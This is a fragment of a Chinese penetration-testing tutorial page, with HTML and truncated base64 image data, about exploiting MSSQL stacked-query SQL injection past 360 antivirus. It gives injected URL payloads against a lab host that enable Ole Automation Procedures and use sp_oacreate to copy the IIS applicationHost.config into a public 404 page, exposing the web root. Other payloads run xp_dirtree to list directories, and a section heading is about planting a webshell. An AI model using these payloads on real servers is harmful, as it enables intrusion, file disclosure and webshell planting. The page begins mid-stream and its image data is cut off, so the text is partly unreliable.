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
|
|||
|
|
<p blockindex=8>可以看到xp_cmdshell是直接使用cmd /c来执行命令的</p>
|
|||
|
|
<p blockindex=9>这拦截的原因和之前的php很相似</p>
|
|||
|
|
<p blockindex=10>不过这里没有php那么高的操作空间</p>
|
|||
|
|
<h1 blockindex=11>0x03 写webshell到网站根目录</h1>
|
|||
|
|
<p blockindex=12>一般来说都是IIS+MSSQL的搭配,MSSQL可以用sp_oacreate来执行一些读写功能,因为不调用cmd所以360不会拦截,前提是需要知道网站的根目录</p>
|
|||
|
|
<p blockindex=13>如果权限够高可以直接将IIS配置文件404页面</p>
|
|||
|
|
<p blockindex=14>首先要开启sp_oacareate这个存储过程</p>
|
|||
|
|
<pre blockindex=15><code class="hljs language-sql"><span class=hljs-keyword>exec</span> sp_configure <span class=hljs-string>'show advanced options'</span>, <span class=hljs-number>1</span>;RECONFIGURE
|
|||
|
|
<span class=hljs-keyword>exec</span> sp_configure <span class=hljs-string>'Ole Automation Procedures'</span>,<span class=hljs-number>1</span>;RECONFIGURE
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=16>然后用sp_oacreate创建scripting.filesystemobject对象调用copyfile这个方法来实现复制文件</p>
|
|||
|
|
<pre blockindex=17><code class="hljs language-sql"><span class=hljs-keyword>declare</span> <span class=hljs-variable>@o</span> <span class=hljs-type>int</span>
|
|||
|
|
<span class=hljs-keyword>exec</span> sp_oacreate <span class=hljs-string>'scripting.filesystemobject'</span>, <span class=hljs-variable>@o</span> <span class=hljs-keyword>out</span>
|
|||
|
|
<span class=hljs-keyword>exec</span> sp_oamethod <span class=hljs-variable>@o</span>, <span class=hljs-string>'copyfile'</span>,<span class=hljs-keyword>null</span>,<span class=hljs-string>'C:\Windows\System32\inetsrv\config\applicationHost.config'</span> ,<span class=hljs-string>'C:\inetpub\custerr\zh-CN\404.htm'</span>;
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=18>这里的配置文件是IIS7的,路径是固定的,404的路径也是固定的,只要权限够高就可以复制过来</p>
|
|||
|
|
<p blockindex=19>当然如果是国外语言路径可能会变化</p>
|
|||
|
|
<p blockindex=20><img src="data:image/png;base64,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
|
|||
|
|
<pre blockindex=21><code class="hljs language-php">http:<span class=hljs-comment>//192.168.159.128/index.aspx?user_id=1;</span>
|
|||
|
|
exec sp_configure <span class=hljs-string>'show advanced options'</span>, <span class=hljs-number>1</span>;RECONFIGURE;
|
|||
|
|
exec sp_configure <span class=hljs-string>'Ole Automation Procedures'</span>,<span class=hljs-number>1</span>;RECONFIGURE;
|
|||
|
|
<span class=hljs-keyword>declare</span> @o <span class=hljs-keyword>int</span>;
|
|||
|
|
exec sp_oacreate <span class=hljs-string>'scripting.filesystemobject'</span>, @o out;
|
|||
|
|
exec sp_oamethod @o, <span class=hljs-string>'copyfile'</span>,<span class=hljs-literal>null</span>,<span class=hljs-string>'C:\Windows\System32\inetsrv\config\applicationHost.config'</span> ,<span class=hljs-string>'C:\inetpub\custerr\zh-CN\404.htm'</span>;
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=22>然后访问一个不存在的页面就可以找到网站根目录</p>
|
|||
|
|
<p blockindex=23><img src="data:image/png;base64,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
|
|||
|
|
<p blockindex=24>权限低的话可以用xp_dirtree来找就是有点慢</p>
|
|||
|
|
<pre blockindex=25><code class="hljs language-php">http:<span class=hljs-comment>//192.168.159.128/index.aspx?user_id=1;</span>
|
|||
|
|
CREATE TABLE tmp (dir varchar(<span class=hljs-number>8000</span>),num <span class=hljs-keyword>int</span>,num1 <span class=hljs-keyword>int</span>);
|
|||
|
|
insert into tmp(dir,num,num1) execute master..xp_dirtree <span class=hljs-string>'c:'</span>,<span class=hljs-number>1</span>,<span class=hljs-number>1</span>;
|
|||
|
|
</code></pre>
|
|||
|
|
<p blockindex=26>先创建一个tmp表然后将xp_dirtree的结果输出到tmp中</p>
|
|||
|
|
<p blockindex=27><img src="data:image/png;base64,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